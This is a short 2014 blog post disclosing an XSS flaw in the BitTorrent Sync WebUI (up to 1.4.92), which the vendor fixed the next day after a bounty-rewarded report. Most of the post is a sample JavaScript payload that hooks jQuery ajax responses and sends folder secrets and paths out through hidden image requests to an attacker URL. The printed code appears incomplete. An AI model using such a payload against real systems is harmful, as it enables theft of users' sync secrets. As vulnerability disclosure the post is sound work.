Monday, December 29, 2014

BitTorrent Sync WebUI XSS vulnerability

BitTorrent Sync WebUI (<= 1.4.92) is affected by XSS vulnerability that could be exploitable in some rare scenarios.

Proof of concept video (stealing secrets):

PoC exploit uses jQuery global ajax hook (jQuery library is already used in WebUI) to fetch necessary data (secrets in our case) directly from internal ajax responses instead of DOM parsing.

Sample payload:
fakeImgUrl = '';
folders = [];

// ajax hook - all data is there
$(document).ajaxComplete(function(event, xhr, settings) {
 try {

  for(var i in json.folders) {
   var str=encodeURIComponent(json.folders[i].secret+':'+json.folders[i].path+':'+json.folders[i].status);

   if (folders.indexOf(str)==-1) {
    $('body').append('<img style=\'display:none\' src=\''+fakeImgUrl+'?'+str+'\'>');
    console.log('SEND ' + str);
 } catch (e) {
  // error

I've found also minor XSS on

Reported: 15.10.2014
Fixed: 16.10.2014
Unexpected surprise bounty: 500 USD